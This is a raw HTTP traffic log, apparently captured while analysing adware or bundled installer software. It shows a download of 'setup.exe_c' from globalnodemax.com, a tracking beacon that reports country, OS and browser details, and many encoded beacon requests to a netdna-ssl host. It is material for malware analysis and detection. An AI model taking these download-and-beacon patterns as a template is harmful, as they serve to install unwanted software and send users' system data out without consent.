GET /web/gf/all/setup.exe_c HTTP/1.1
Host: dl.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:39 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1438313681"
Last-Modified: Fri, 31 Jul 2015 03:34:41 GMT
Cache-Control: max-age=488
Content-Length: 2113811
Content-Type: text/plain
X-HW: 1438402659.dop004.fr7.t,1438402659.cds022.fr7.c
<<< skipped >>>
GET /monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402674&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402674 HTTP/1.1
Host: logs.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:52 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1438402673.dop007.fr7.t,1438402672.cds021.fr7.c
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=14220 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 01 Aug 2015 04:17:39 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrevysBL0IwHwhEolvsKoHiSTZUc6Aooj3S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqn4U8uoq4rC8jC8FaAJlN651M0VcwJ5frh3qtelLT3faUxGFR6X233hgA9D6a NOqQqDB Pa/ WrFM5s3KGksryS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXPceMBfl/cy8CFIZ4bs6830kOkPP/ lcqmO6sjIL1AsI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXN2I0qd4G3ExvDbcr2ZCWDFAL52sIXt4UoKtXISWiV4lHG3D5R3V5O0a/7yn1m/tGd3P3SqySAb8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1i6nyHpDS4bOY4G r 3F6T7vd0ZIK3zyHSv9W41Hn7OPSVNckomstbKncplbj8o7GcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGVCQ/iYxoLxYRi59DA/1o2VnsTn5x9YJkyrBnDEBfh98= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1j2vh7hk0cgBBQC drCF7eFGvGaf/td2Ate b6qsnxJzJ8pV57JU0YPOPNuNctLNP94FMchecJC7sTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1ip5hhmFUu/wdCUHeR8YCF35glrEy57w/m07ReD/zc3 EeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1gHhLicvnhfXymF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIUtlaETKETqg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YMtu6Il6K42sySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZUJD JjGgvFhGLn0MD/WjZWexOfnH1gmTKsGcMQF H3w== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRocVwJfcRD1hSQlC/zd7KOiMVqC1aQjPYhHXQCU3Lc8Q3I09qFSwMRx7chrAtAyGHdP0R3cfJ7wsVP0mBGThSfj2Y743nJF0Et2KSc6n6A 69 G16P6Q/NHHP17JfUpG Ji5arKdNEreckyFWuwLl8SUgCLrWouma3IRzlg AfWd4lkaGHrSYSPAUGF/VaQ721H65Q0hM/lq0CiIjt69UWEXAlPNSddhz9LPVA2pp5No30Bplu5X17vgTHWpj//cWf8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoVez2xuA6YrxdKm30ZIdZdA/6UnSy/9g5ij9W2jsh ZY4cGjsXTcXKxAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3cdBa1e8eaz1xJq30BnBykcZjhRhNNnVmEbsjT/KCK3V HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=wlkQ3WKgYpSE2rQtmh2LBE7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNV6LgZQ8/fOZCiThn9Pg6 S4c9vITM5TWw HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoY09ECF87Zuss IILilpWF1SqCHr/94rW31vzipeVYvpr maR6b3/MexiezSykY/Z1O8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnChhLYWo4Y/ac5Rhs262b79EFhM2/f2sowhNepyLa8nM= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=QgW8pN5r26ZQhScA1jb3T4/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVrvBOGo5I8L8Nh3QJEALW3TAEnwHOHrhhSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZUJD JjGgvFhGLn0MD/WjZWexOfnH1gmTKsGcMQF H3w== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=rdr4ABua5zdnA3VLGqrT9ZTha5n8fKHmaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO31QHs3X92ilEoPfCrfVvRJhQC drCF7eF8q1Ber6XmkpQzH1M0FuaRLhj0DU1QbcRtcNvMmRKJ05TvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKMITXqci2vJz HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=PcwT4QFtuPClUB4b/muCJY/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMCMAVuazOQA/ySFcG0T/jYU B 0jBTIO6c73FtBcCD66pyI/h/Xw7wdFAL52sIXt4Xfzqkf5HpieYAG6kIeOqURJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=N6dOqWm8Q97B 4EkIHdGP3TONeCOZhCdnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i4nJwzEzT2yGMAVuazOQA/ySFcG0T/jYU B 0jBTIO6c73FtBcCD66pyI/h/Xw7wdFAL52sIXt4Xfzqkf5HpieYAG6kIeOqURJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=xY8ohDYpM gLjT49fHfOTNcxGaPWyPpOjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF8PMHri1e7C9NPJ5v96kxwbVWTFo Vb8YXwF8xC533FcDPI5dGTWg7/48CMVjnZqYc8xmpxiLTPo dgTcNa6NZpFhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YPTQLrSsAb MLus5Wbw9bkMfiZm 4OAHnaoKai08bVxwYEQnuvuDBXEJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=/k6kR j50trrVVBzJuBn8mByKcxzlv585nZO8ehumXaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJr1EjiAPKYgDfV9OCtHXZfA3mXJEY39mHAhwsRGINruhhsseF9XKGr8l4l5 9UEJ lex/kVKG eu03e5/1jzsDq/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGUE1ePzby02CzsHlRkWrcy9e991jqD0JbjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=/k6kR j50trrVVBzJuBn8mByKcxzlv585nZO8ehumXaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJr1EjiAPKYgDfV9OCtHXZfA3mXJEY39mHAhwsRGINruja7CNvvxDM30ViblVFPL pCuWqMo7ZG/Qxztg6 4zwmphq5YRs3Ua3kOLZWZ3INLBBsDkaVI3AuytGSEdboIzGfiB 3gBuZcl5Xe6ZTKO9HKqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0acKGEthajhj9pzlGGzbrZvv0QWEzb9/ayjCE16nItrycw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YNYlTZYFVSl7P5bll8sXmM6QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd3HQWtXvHms9cSat9AZwcpHGY4UYTTZ1ZhG7I0/ygit1Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqnJyMz45O1xrVtQeXCcg/Fhy2/UUM264sa8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXFASu7RG65lHSpt9GSHWXQQ9Ss5KWeJ1R3qPv/BEEOxGiq9ZfonCR6Oox6FF19pfqJlifxMfc97cyVb1EWo6eKpVEOys WrB2aQstvfmMt gOHtlA/bkx4QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd3HQWtXvHms9cSat9AZwcpHGY4UYTTZ1ZhG7I0/ygit1Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:00 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1i/TyjmwB5PDLPiCC4paVhdKFaiVC/aI3DG654koUNxkC3QPqxzrS768NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
GET /27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1g89M3w jUOHhMAGkRtqR4lD3rLLdbpIg4ArRJ9EKY7l4SdQYeWHlEHJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:01 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS....
